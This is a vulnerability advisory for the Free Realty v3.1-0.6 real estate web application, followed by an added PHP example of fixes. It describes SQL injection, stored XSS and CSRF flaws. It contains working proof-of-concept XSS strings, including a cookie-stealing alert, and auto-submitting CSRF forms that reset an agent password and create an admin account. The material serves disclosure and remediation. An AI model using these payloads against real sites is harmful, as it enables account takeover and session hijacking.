Free Realty v3.1-0.6: Introduction to Its Vulnerabilities and How to Fix Them
Title: Free Realty v3.1-0.6 - Multiple Web Vulnerabilities

Introduction:
=============
Free Realty is primarily designed for real estate agents and offices to list properties on the internet. With Free Realty the end user does not need to be fluent in web page design. Read more in the demo site
This is a fork of software written by Jon Roig called Open Realty. Jon has moved on to version 3.0 while a number of users have requested continued development on the 2.x series. Other sites of note regarding 2.x development
www.1axn.com/gi-bin/openforum/ikonboard.cgi the original discussion board, before Jon opened up his own.

Affected versions:
=========
A Vulnerability Laboratory Researcher Team discovered multiple Web Vulnerabilities in the Free Realty v3.1-0.6 web application.

Issue type: Remote

Technical analysis:
========
1.1
A remote SQL injection vulnerability is detected in the Free Realty v3.1-0.6 web application. The vulnerability allows a remote attacker or a local low-privileged user account to inject and execute their own SQL commands on the affected application's DBMS. Successful exploitation of the vulnerability results in DBMS and application compromise.

Vulnerable Module(s):
[+] agentdisplay.php?view=
[+] /admin/admin.php?edit=

1.2
Multiple persistent input validation vulnerabilities are detected in the Free Realty v3.1-0.6 web application. The bugs allow remote attackers to inject malicious script code on the application side (persistent). Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user interaction.

Vulnerable Module(s):
[+] admin/agenteditor.php - inject notes about the Agent
[+] agentadmin.php?edit=2 - inject title / preview description: / Long description: / notes
[+] agentadmin.php?action=addlisting inject title / preview description: / Long description: / notes
[+] admin/adminfeatures.php - Add new feature

1.3
A cross site request forgery vulnerability is detected in the Free Realty v3.1-0.6 web application. The bugs allow remote attackers with high required user interaction to edit user accounts. Successful exploitation can lead to account access. To exploit the issue the attacker needs to create a manipulated copy of the edit user mask/form. Inside the document the remote attacker can set his own values for the update, because there is no form or token protection. When the admin is then lured into executing the script via a link, the new values are applied by the application's update, provided his session has not expired.

Vulnerable Module(s):
[+] admin/agenteditor.php?action=addagent - Add agent
[+] admin/agenteditor.php?adminmodify=2 - Modify Agent

Proof of concept:
=================
1.1
The SQL injection vulnerability can be exploited by remote attackers without user interaction. For demonstration or reproduce ...

PoC:
https://www.jb51.net /FR/agentdisplay.php?view=1
http://127.0.0.1/FR/admin/admin.php?edit=2

1.2
The persistent input validation vulnerability can be exploited by remote attackers with medium to low required user interaction. For demonstration or reproduce ...

Note:
The issue can be exploited by an insert on the Created Object function with script code as value. The result is the persistent execution out of the web application context.

Strings:
>"<<iframe src=http:// www.jb51.net />37</iframe> ...
or
>"<script>alert(document.cookie)</script><div style="1

1.3
The CSRF vulnerability can be exploited by remote attackers with high required user interaction. For demonstration or reproduce ...

<html>
<form name="test" action="http://127.0.0.1/FR/admin/agenteditor.php?adminmodify=2" method="post">
<input type="hidden" name="agent" value="test2"><br/>
<input type="hidden" name="agenttitle" value="test3"><br/>
<input type="hidden" name="agentpass" value="storm"><br/>
</form>
<script>document.test.submit();</script>
</html>

<html>
<form name="addagent" action="http://127.0.1.1/FR/admin/agenteditor.php?action=addagent" method="post">
<input type="hidden" name="agent" value="test3"><br/>
<input type="hidden" name="agenttitle" value="test3"><br/>
<input type="hidden" name="agentpass" value="test3"><br/>
<input type="hidden" name="agentfax" value="test3"><br/>
<input type="hidden" name="agentcell" value="test3"><br/>
<input type="hidden" name="agentphone" value="test3"><br/>
<input type="hidden" name="agenturl" value="test3"><br/>
<input type="hidden" name="agentemail=" value="test3@hotmail.com"><br/>
<input type="hidden" name="user_level" value="admin"><br/>
<input type="hidden" name="notes" value="TEST#"><br/>
</form>
<script>document.addagent.submit();</script>
</html>

Risk:
=====
1.1
The security risk of the remote SQL injection vulnerability is estimated as critical.
1.2
The security risk of the persistent input validation vulnerability is estimated as medium.
1.3
The security risk of the cross site request forgery vulnerability is estimated as low(+).
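
The advisory lists the three issue classes but no fix, so the following is an added example (not code from the advisory or from Free Realty) of the corresponding server-side checks: a bound integer parameter for `view=`/`edit=` (1.1), output encoding for stored fields such as notes (1.2), and a per-session token for the agenteditor.php forms (1.3). The helper names, the `agents` table and its columns, and the `csrf_token` field are assumptions for illustration, and the data is constructed.

```php
<?php
declare(strict_types=1);
// Added example, not Free Realty's code: table/column names and the
// csrf_token field are assumptions; in-memory SQLite holds constructed data.

// 1.1: accept only a positive integer for view= / edit=, then bind it.
function fetch_agent(PDO $db, $rawId): ?array {
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // anything but a positive integer is rejected before SQL
    }
    $stmt = $db->prepare('SELECT id, agent, notes FROM agents WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 1.2: encode stored fields (title, descriptions, notes) at output time.
function e(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// 1.3: per-session token, embedded in the agent forms and checked on POST.
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function csrf_valid(array $session, array $post): bool {
    return isset($session['csrf_token'], $post['csrf_token'])
        && is_string($post['csrf_token'])
        && hash_equals($session['csrf_token'], $post['csrf_token']);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE agents (id INTEGER PRIMARY KEY, agent TEXT, notes TEXT)');
$db->prepare('INSERT INTO agents (agent, notes) VALUES (?, ?)')
   ->execute(['test2', '>"<script>alert(document.cookie)</script>']);

var_dump(fetch_agent($db, '1 OR 1=1'));        // non-integer view= value
echo e(fetch_agent($db, '1')['notes']), "\n";  // stored markup printed encoded
$session = [];
$token = csrf_token($session);
// A cross-site auto-submitted form carries the fields but not the token.
var_dump(csrf_valid($session, ['agent' => 'test2', 'agentpass' => 'storm']));
var_dump(csrf_valid($session, ['agent' => 'test2', 'csrf_token' => $token]));
```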